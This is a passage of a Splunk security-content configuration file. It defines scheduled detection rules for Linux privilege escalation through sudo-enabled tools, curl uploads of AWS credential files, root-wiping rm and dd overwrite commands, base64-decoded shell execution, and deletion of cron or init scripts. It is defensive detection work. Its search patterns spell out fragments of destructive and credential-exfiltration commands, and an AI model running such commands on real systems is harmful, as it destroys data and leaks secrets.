as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*cpulimit*" AND Processes.process="*-l*" AND Processes.process="*-f*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_cpulimit_privilege_escalation_filter` [ESCU - Linux Csvtool Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = csvtool is an easy to use command-line tool to work with .CSV files. If sudo right is given to the tool for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = csvtool is an easy to use command-line tool to work with .CSV files. If sudo right is given to the tool for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. 
action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-11 action.escu.modification_date = 2022-08-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Csvtool Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 10}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 10}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 10}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Csvtool Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*csvtool*" AND 
Processes.process="*call*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_csvtool_privilege_escalation_filter` [ESCU - Linux Curl Upload File - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies curl being utilized with the -F or --form, --upload-file, -T, -d, --data, --data-raw, -I and --head switches to upload AWS credentials or config to a remote destination. This enables uploading of binary files and so forth. To force the 'content' part to be a file, prefix the file name with an @ sign. To just get the content part from a file, prefix the file name with the symbol <. The difference between @ and < is then that @ makes a file get attached in the post as a file upload, while the < makes a text field and just gets the contents for that text field from a file. This technique was utilized by the TeamTNT group to exfiltrate AWS credentials. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies curl being utilized with the -F or --form, --upload-file, -T, -d, --data, --data-raw, -I and --head switches to upload AWS credentials or config to a remote destination. This enables uploading of binary files and so forth. To force the 'content' part to be a file, prefix the file name with an @ sign. To just get the content part from a file, prefix the file name with the symbol <. The difference between @ and < is then that @ makes a file get attached in the post as a file upload, while the < makes a text field and just gets the contents for that text field from a file. 
This technique was utilized by the TeamTNT group to exfiltrate AWS credentials. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Filtering may be required. In addition to AWS credentials, add other important files and monitor. The inverse would be to look for _all_ -F behavior and tune from there. action.escu.creation_date = 2022-07-29 action.escu.modification_date = 2022-07-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Curl Upload File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Living Off The Land", "Data Exfiltration", "Ingress Tool Transfer"] action.risk = 1 action.risk.param._risk_message = An instance of $process_name$ was identified on endpoint $dest$ by user $user$ attempting to upload important files to a remote destination. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Curl Upload File - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Living Off The Land", "Data Exfiltration", "Ingress Tool Transfer"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies curl being utilized with the -F or --form, --upload-file, -T, -d, --data, --data-raw, -I and --head switches to upload AWS credentials or config to a remote destination. This enables uploading of binary files and so forth. To force the 'content' part to be a file, prefix the file name with an @ sign. To just get the content part from a file, prefix the file name with the symbol <. The difference between @ and < is then that @ makes a file get attached in the post as a file upload, while the < makes a text field and just get the contents for that text field from a file. This technique was utlized by the TeamTNT group to exfiltrate AWS credentials. 
action.notable.param.rule_title = Linux Curl Upload File
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=curl Processes.process IN ("*-F *", "*--form *", "*--upload-file *", "*-T *", "*-d *", "*--data *", "*--data-raw *", "*-I *", "*--head *") AND Processes.process IN ("*.aws/credentials*", "*.aws/config*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_curl_upload_file_filter`

[ESCU - Linux Data Destruction Command - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a Unix shell command that can wipe the root folders of a Linux host. This command line is abused by the AwfulShred malware, which wipes or corrupts files on a targeted Linux host. The shell command uses the rm command with forced recursive deletion, even in the root folder. This TTP can be a good indicator that a user or a process wants to wipe the files of the root directory on a Linux host.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies a Unix shell command that can wipe the root folders of a Linux host. This command line is abused by the AwfulShred malware, which wipes or corrupts files on a targeted Linux host. The shell command uses the rm command with forced recursive deletion, even in the root folder. This TTP can be a good indicator that a user or a process wants to wipe the files of the root directory on a Linux host.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Data Destruction Command - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["AwfulShred", "Data Destruction"]
action.risk = 1
action.risk.param._risk_message = $process_name$ executed the rm command with the --no-preserve-root parameter, which can wipe root files on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 90}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Data Destruction Command - Rule
action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies a Unix shell command that can wipe the root folders of a Linux host. This command line is abused by the AwfulShred malware, which wipes or corrupts files on a targeted Linux host. The shell command uses the rm command with forced recursive deletion, even in the root folder. This TTP can be a good indicator that a user or a process wants to wipe the files of the root directory on a Linux host.
action.notable.param.rule_title = Linux Data Destruction Command
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name="rm" AND Processes.process IN ("* -rf*", "* -fr*") AND Processes.process="* --no-preserve-root" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_data_destruction_command_filter`

[ESCU - Linux DD File Overwrite - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the dd command being used to overwrite a file. This technique has been abused by adversaries and threat actors to destroy files or data on a specific system, or on a large number of hosts within a network, to interrupt host availability, services and more. It is also used to destroy data in a way that makes files irrecoverable by forensic techniques, by overwriting files, data, or local and remote drives.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the dd command being used to overwrite a file. This technique has been abused by adversaries and threat actors to destroy files or data on a specific system, or on a large number of hosts within a network, to interrupt host availability, services and more. It is also used to destroy data in a way that makes files irrecoverable by forensic techniques, by overwriting files, data, or local and remote drives.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives.
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux DD File Overwrite - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Data Destruction", "Industroyer2"]
action.risk = 1
action.risk.param._risk_message = A command line $process$ was executed on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux DD File Overwrite - Rule
action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Industroyer2"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic looks for the dd command being used to overwrite a file. This technique has been abused by adversaries and threat actors to destroy files or data on a specific system, or on a large number of hosts within a network, to interrupt host availability, services and more. It is also used to destroy data in a way that makes files irrecoverable by forensic techniques, by overwriting files, data, or local and remote drives.
action.notable.param.rule_title = Linux DD File Overwrite
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name="dd" AND Processes.process="*of=*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_dd_file_overwrite_filter`

[ESCU - Linux Decode Base64 to Shell - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects the behavior of decoding base64-encoded data and passing it to a Linux shell. Additionally, it mitigates the potential damage and protects the organization's systems and data. The detection is made by searching for specific commands in the Splunk query, namely "base64 -d" and "base64 --decode", within the Endpoint.Processes data model. The analytic also includes a filter for Linux shells. The detection is important because it indicates the presence of malicious activity, since Base64 encoding is commonly used to obfuscate malicious commands or payloads, and decoding it can be a step in running those commands. It suggests that an attacker is attempting to run malicious commands on a Linux system to gain unauthorized access, exfiltrate data, or perform other malicious actions.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1027", "T1059.004"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic detects the behavior of decoding base64-encoded data and passing it to a Linux shell. Additionally, it mitigates the potential damage and protects the organization's systems and data. The detection is made by searching for specific commands in the Splunk query, namely "base64 -d" and "base64 --decode", within the Endpoint.Processes data model. The analytic also includes a filter for Linux shells. The detection is important because it indicates the presence of malicious activity, since Base64 encoding is commonly used to obfuscate malicious commands or payloads, and decoding it can be a step in running those commands. It suggests that an attacker is attempting to run malicious commands on a Linux system to gain unauthorized access, exfiltrate data, or perform other malicious actions.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives may be present based on legitimate software being utilized. Filter as needed.
action.escu.creation_date = 2022-07-27
action.escu.modification_date = 2022-07-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Decode Base64 to Shell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Linux Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ decoding base64 and passing it to a shell.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 25}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Decode Base64 to Shell - Rule
action.correlationsearch.annotations = {"analytic_story": ["Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1027", "T1059.004"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic detects the behavior of decoding base64-encoded data and passing it to a Linux shell. Additionally, it mitigates the potential damage and protects the organization's systems and data. The detection is made by searching for specific commands in the Splunk query, namely "base64 -d" and "base64 --decode", within the Endpoint.Processes data model. The analytic also includes a filter for Linux shells. The detection is important because it indicates the presence of malicious activity, since Base64 encoding is commonly used to obfuscate malicious commands or payloads, and decoding it can be a step in running those commands. It suggests that an attacker is attempting to run malicious commands on a Linux system to gain unauthorized access, exfiltrate data, or perform other malicious actions.
action.notable.param.rule_title = Linux Decode Base64 to Shell
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("*base64 -d*", "*base64 --decode*") AND Processes.process="*|*" `linux_shells` by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_decode_base64_to_shell_filter`

[ESCU - Linux Deleting Critical Directory Using RM Command - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies a suspicious deletion of a critical folder on a Linux machine using the rm command. This technique was seen in the Industroyer2 campaign to wipe or destroy energy facilities of a targeted sector. Deletions in this list of folders are not common, since elevated privileges are needed to access some of them. We recommend looking further at related events, especially file access or file deletion events and process command lines that may be related to this technique.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies a suspicious deletion of a critical folder on a Linux machine using the rm command. This technique was seen in the Industroyer2 campaign to wipe or destroy energy facilities of a targeted sector. Deletions in this list of folders are not common, since elevated privileges are needed to access some of them. We recommend looking further at related events, especially file access or file deletion events and process command lines that may be related to this technique.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrator or network operator can use this application for automation purposes. Please update the filter macros to remove false positives.
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Deleting Critical Directory Using RM Command - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["AwfulShred", "Data Destruction", "Industroyer2"]
action.risk = 1
action.risk.param._risk_message = A deletion in a known list of critical folders using the rm command $process$ was executed on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Deleting Critical Directory Using RM Command - Rule
action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "Data Destruction", "Industroyer2"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies a suspicious deletion of a critical folder on a Linux machine using the rm command. This technique was seen in the Industroyer2 campaign to wipe or destroy energy facilities of a targeted sector. Deletions in this list of folders are not common, since elevated privileges are needed to access some of them. We recommend looking further at related events, especially file access or file deletion events and process command lines that may be related to this technique.
action.notable.param.rule_title = Linux Deleting Critical Directory Using RM Command action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name =rm AND Processes.process= "* -rf *" AND Processes.process IN ("*/boot/*", "*/var/log/*", "*/etc/*", "*/dev/*") by Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_deleting_critical_directory_using_rm_command_filter` [ESCU - Linux Deletion Of Cron Jobs - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a deletion of cron job in a linux machine. This technique can be related to an attacker, threat actor or malware to disable scheduled cron jobs that might be related to security or to evade some detections. We also saw that this technique can be a good indicator for malware that is trying to wipe or delete several files on the compromised host like the acidrain malware. This anomaly detection can be a good pivot detection to look for process and user doing it why they doing. Take note that this event can be done by administrator so filtering on those possible false positive event is needed. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a deletion of cron job in a linux machine. This technique can be related to an attacker, threat actor or malware to disable scheduled cron jobs that might be related to security or to evade some detections. We also saw that this technique can be a good indicator for malware that is trying to wipe or delete several files on the compromised host like the acidrain malware. This anomaly detection can be a good pivot detection to look for process and user doing it why they doing. Take note that this event can be done by administrator so filtering on those possible false positive event is needed. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. 
action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Deletion Of Cron Jobs - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AcidRain", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = Linux cron jobs are deleted on host $dest$ by process GUID- $process_guid$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Deletion Of Cron Jobs - Rule action.correlationsearch.annotations = {"analytic_story": ["AcidRain", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.action=deleted Filesystem.file_path="/etc/cron.*" by _time span=1h Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.process_guid Filesystem.action | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | 
`security_content_ctime(lastTime)`| `linux_deletion_of_cron_jobs_filter` [ESCU - Linux Deletion Of Init Daemon Script - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a deletion of init daemon script in a linux machine. daemon script that place in /etc/init.d/ is a directory that can start and stop some daemon services in linux machines. attacker may delete or modify daemon script to impair some security features or act as defense evasion in a compromised linux machine. This TTP can be also a good indicator of a malware trying to wipe or delete several files in compromised host as part of its destructive payload like what acidrain malware does in linux or router machines. This detection can be a good pivot to check what process and user tries to delete this type of files which is not so common and need further investigation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a deletion of init daemon script in a linux machine. daemon script that place in /etc/init.d/ is a directory that can start and stop some daemon services in linux machines. attacker may delete or modify daemon script to impair some security features or act as defense evasion in a compromised linux machine. This TTP can be also a good indicator of a malware trying to wipe or delete several files in compromised host as part of its destructive payload like what acidrain malware does in linux or router machines. This detection can be a good pivot to check what process and user tries to delete this type of files which is not so common and need further investigation. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. 
If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Deletion Of Init Daemon Script - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AcidRain", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = Init daemon script deleted on host $dest$ by process GUID- $process_guid$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Deletion Of Init Daemon Script - Rule action.correlationsearch.annotations = {"analytic_story": ["AcidRain", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a deletion of init daemon script in a linux machine. daemon script that place in /etc/init.d/ is a directory that can start and stop some daemon services in linux machines. 
